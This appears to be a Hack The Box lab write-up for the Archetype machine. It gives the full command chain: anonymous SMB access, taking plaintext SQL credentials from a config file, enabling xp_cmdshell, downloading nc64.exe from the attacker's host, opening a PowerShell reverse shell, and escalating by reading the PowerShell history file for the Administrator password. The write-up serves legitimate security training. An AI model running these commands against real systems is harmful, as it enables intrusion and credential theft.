HTB Notes: Archetype

SMB

Scanning the machine we find the following services running:

1. SMB (445)

2. SQL Server (1433)

We can list the shares or services by using the following command.

smbclient -L //10.129.227.227 --user=Administator

This works because the SMB server is misconfigured and accepts a blank password for the Administrator account. The following command also works.

smbclient --no-pass -L //10.129.227.227

We find a share that we can access via smbclient --no-pass //10.129.227.227/backups. We find the prod.dtsConfig file and copy it over local machine.

On reading this configuration file, we find a user's credentials in plaintext, username (sql_svc) and the password.

SQL Server

We can connect to the SQL Server using mssqlclient.py from the Impacket collection.

There's a command to turn on xp_cmdshell.

We can run Windows shell commands via xp_cmdshell such as whoami and dir.

We can see that the machine has powershell by running xp_cmdshell powershell -c pwd. This makes our life much easier, as you can see later, because we can use wget.

Reverse shell

Now that we're able to run shell commands, we can get a reverse shell.

1. We download nc64.exe, with the intention of getting our target to download and run it. Using netcat to create a stable reverse shell is much easier than using shell code found on the internet.

2. We run our web server on port 80 using python3 -m http.server 80

3. We run our netcat listener on port 8001 using nc -lvnp 8001

4. We get our target to download nc64.exe, via xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.19/nc64.exe -outfile nc64.exe". We need to find a directory where we have permissions to save a file, C:\Users\sql_svc\Downloads works.

5. We then get our target to connect to us, thereby creating a reverse shell. xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e powershell.exe 10.10.14.19 8001"

Now, that we've got the reverse shell on the user's machine, we can easily find the user flag.

Privilege Escalation

We use a similar trick mentioned above, except this time we download winPEAS and host it on our web server. Using our reverse shell we download winPEAS in the Downloads folder on the target's machine.

wget http://10.10.14.19/winPEASx64.exe -outfile winPEASx64.exe

Now we can run ./winPEASx64.exe.

There's a lot of output on all the potential ways you could escalate your privileges on this Windows machine. But, we'll focus on an easy way.

We take a look inside the Powershell history file. Which stores previously run Powershell commands.

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

We find the Administrator password in there, when it was used in a previous command related to connecting to a network. Now we can connect to the Windows machine as an Administrator using psexec.py another tool from Impacket.

psexec.py Administrator@10.129.227.227

Reflection

This machine highlighted the importance of:

1. Disabling passwordless login

2. Not storing user credentials in config files

3. Not using passwords in command line arguments

4. Restricting privileges in SQL Server

It's interesting to see all the different paths an attacker could take to gain access to a target machine.